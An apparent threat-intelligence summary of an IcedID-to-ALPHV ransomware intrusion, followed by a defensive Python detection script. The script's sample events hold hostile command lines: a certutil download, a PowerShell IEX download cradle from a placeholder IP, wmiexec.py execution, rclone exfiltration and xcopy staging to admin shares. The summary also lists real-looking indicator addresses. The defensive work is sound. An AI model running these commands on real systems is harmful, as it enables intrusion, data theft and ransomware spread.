ScreenConnect and RDP access were set up ahead of the ALPHV ransomware deployment

Ransomware is used by threat actors to encrypt victims' data and hold it hostage until a ransom is paid. The attack works because data is time-critical and central to the operations of individuals and businesses, so many victims feel they have no option but to pay for a quick recovery. This intrusion began with an email carrying a forked IcedID variant that focuses on payload delivery.

After gaining initial access, the intruder installed ScreenConnect on the host for remote management, used Cobalt Strike beacons, and deployed the CSharp Streamer RAT to harvest credentials and move laterally to domain controllers and servers. During the collection stage, sensitive data was gathered with 'confucius_cpp', a custom tool, and exfiltrated with rclone. Over eight days the actor repeatedly deployed ScreenConnect installers across hosts using WMI before finally pushing ALPHV ransomware payloads after deleting backups.

ALPHV ransomware deployment

A malicious spam email, which tricked the victim into downloading and unzipping an archive containing a readme and a Visual Basic Script (VBS), served as the initial access vector. Running the VBS executed an embedded, obfuscated IcedID loader DLL that dropped and ran a second IcedID DLL payload, completing the infection chain, according to The DFIR Report. This is consistent with known malicious activity in which the same method was used to distribute an IcedID fork that focuses on payload delivery rather than banking fraud.

Several methods were used to drop Cobalt Strike beacons, including bitsadmin, certutil, and PowerShell. The CSharp Streamer RAT maintained persistence through scheduled tasks and was used for LSASS credential dumping, lateral movement, and C2 communications. IcedID established its own persistence via scheduled tasks, while ScreenConnect persisted across reboots. Process injection into winlogon.exe and rundll32.exe was observed during lateral movement. The actor also used renamed installers.


Key actions included LSASS credential dumping, which was confirmed through memory analysis, and a DCSync performed from the beachhead host against a domain controller to harvest credentials. Before this, the threat actor carried out initial discovery using native Windows utilities launched via IcedID, and later used ScreenConnect for further discovery.

Network scanning with SoftPerfect NetScan took place on several days, targeting IP ranges and the ports used by RPC, SMB, RDP, and Veeam backup services.

ScreenConnect installers were then copied laterally via SMB and executed with wmiexec.py to obtain remote control. The attacker made extensive use of RDP for lateral movement, including RDP proxied through CSharp Streamer. Before exfiltration, a custom tool named confucius_cpp enumerated systems via LDAP queries, accessed shares matching keywords, and compressed the sensitive data. The attacker also previewed documents using the Firefox browser.

The threat actor leveraged numerous tools during the intrusion:

  • IcedID for initial access, communicating with modalefastnow[.]com
  • Cobalt Strike beacons on multiple hosts, connecting to tracked C2 infrastructure
  • CSharp Streamer RAT communicating with 109.236.80.191 over WebSockets on rotating ports
  • ScreenConnect remote access tools deployed as renamed binaries and executed via wmiexec.py

Firefox was used to preview documents and to download rclone, which was then launched via a VBS script for data exfiltration. The final payload was ALPHV ransomware, first executed on the backup server and then deployed across hosts via xcopy and WMI-initiated execution after the backups had been deleted.

A ransom note referencing the group's Twitter account was left behind after encryption.
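The tradecraft above (LOLBin downloads of Cobalt Strike, renamed ScreenConnect installers executed through wmiexec.py, scheduled-task persistence, rclone exfiltration, and xcopy staging of the ransomware to admin shares) is easy to triage from process-creation telemetry. The following is an added example written for this page, not code from The DFIR Report or any tool it names: a small Python rule set run over constructed Sysmon-style process-creation events. The hosts, paths, addresses and the OriginalFileName value for the ScreenConnect installer are placeholders, not artifacts from the intrusion.

```python
"""Triage rules for the behaviours described in the report.
Events are CONSTRUCTED Sysmon Event ID 1 style records (image, PE
OriginalFileName, parent image, command line), not logs from the intrusion."""
import re

SAMPLE_EVENTS = [
    # Cobalt Strike stager fetched with certutil
    {"host": "WS01", "image": r"C:\Windows\System32\certutil.exe",
     "original": "CertUtil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"certutil -urlcache -split -f http://203.0.113.10/up.bin C:\ProgramData\up.bin"},
    # PowerShell download cradle spawned from the IcedID rundll32 host process
    {"host": "WS01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "original": "PowerShell.EXE", "parent": r"C:\Windows\System32\rundll32.exe",
     "cmd": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
            ".DownloadString('http://203.0.113.10/a')"},
    # wmiexec.py style execution: cmd.exe under WmiPrvSE with output redirected
    # to \\127.0.0.1\ADMIN$\__<timestamp>, launching a renamed installer
    {"host": "SRV02", "image": r"C:\Windows\System32\cmd.exe",
     "original": "Cmd.Exe", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmd": r"cmd.exe /Q /c C:\Windows\Temp\update.exe 1> \\127.0.0.1\ADMIN$\__1699999999.12 2>&1"},
    {"host": "SRV02", "image": r"C:\Windows\Temp\update.exe",
     "original": "ScreenConnect.ClientSetup.exe",  # assumed OriginalFileName
     "parent": r"C:\Windows\System32\cmd.exe", "cmd": r"C:\Windows\Temp\update.exe"},
    # Scheduled-task persistence
    {"host": "WS01", "image": r"C:\Windows\System32\schtasks.exe",
     "original": "schtasks.exe", "parent": r"C:\Windows\System32\rundll32.exe",
     "cmd": r'schtasks /create /sc minute /mo 60 /tn "Updater" /tr "rundll32 C:\ProgramData\x.dll,init"'},
    # rclone exfiltration launched from a VBS script (wscript parent)
    {"host": "FS01", "image": r"C:\Users\Public\rclone.exe", "original": "rclone.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmd": r"rclone.exe copy C:\Users\Public\out remote:bucket --transfers 8"},
    # Ransomware binary staged to another host's admin share with xcopy
    {"host": "BKP01", "image": r"C:\Windows\System32\xcopy.exe", "original": "XCOPY.EXE",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"xcopy C:\Windows\Temp\enc.exe \\SRV03\C$\Windows\Temp\ /Y"},
    # Benign control event: must not fire any rule
    {"host": "WS01", "image": r"C:\Windows\System32\cmd.exe", "original": "Cmd.Exe",
     "parent": r"C:\Windows\explorer.exe", "cmd": "cmd.exe /c dir C:\\"},
]

LOLBINS = {"bitsadmin.exe", "certutil.exe", "powershell.exe", "pwsh.exe"}
DOWNLOAD_RE = re.compile(
    r"(?i)(/download\b|/transfer\b|-urlcache|downloadstring|downloadfile|"
    r"invoke-webrequest|start-bitstransfer|https?://)")
# wmiexec.py redirects command output to the local ADMIN$ share under a __<ts> name
WMIEXEC_RE = re.compile(r"(?i)\\\\127\.0\.0\.1\\ADMIN\$\\__")
# UNC path to a remote administrative share (ADMIN$, C$, D$, ...)
ADMIN_SHARE_RE = re.compile(r"(?i)\\\\[^\\\s]+\\(admin|[a-z])\$\\")
RCLONE_RE = re.compile(r"(?i)\b(copy|sync|move)\b\s+\S+\s+\S+:")


def _base(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(event):
    """Return the list of rule names that fire for one process-creation event."""
    img = _base(event["image"])
    orig = event.get("original", "").lower()
    parent = _base(event["parent"])
    cmd = event["cmd"]
    hits = []
    if img in LOLBINS and DOWNLOAD_RE.search(cmd):
        hits.append("lolbin_download")
    if orig and orig != img:  # PE OriginalFileName disagrees with on-disk name
        hits.append("renamed_binary")
    if parent == "wmiprvse.exe" and img == "cmd.exe" and WMIEXEC_RE.search(cmd):
        hits.append("wmiexec_remote_exec")
    if img == "schtasks.exe" and re.search(r"(?i)/create\b", cmd):
        hits.append("schtask_persistence")
    if (img == "rclone.exe" or orig == "rclone.exe") and RCLONE_RE.search(cmd):
        hits.append("rclone_exfil")
    if img == "xcopy.exe" and ADMIN_SHARE_RE.search(cmd):
        hits.append("remote_stage_admin_share")
    return hits


def triage_all(events):
    """(host, rule, command line) for every rule hit, in event order."""
    return [(e["host"], rule, e["cmd"]) for e in events for rule in triage(e)]


if __name__ == "__main__":
    for host, rule, cmd in triage_all(SAMPLE_EVENTS):
        print(f"{host:6} {rule:24} {cmd}")
```

The renamed-binary rule depends on the PE OriginalFileName field, so a stripped or tampered header evades it; the wmiexec.py rule keys on that tool's default output redirection and will miss an operator who changes it. Both are still cheap first-pass signals for exactly the sequence this intrusion followed.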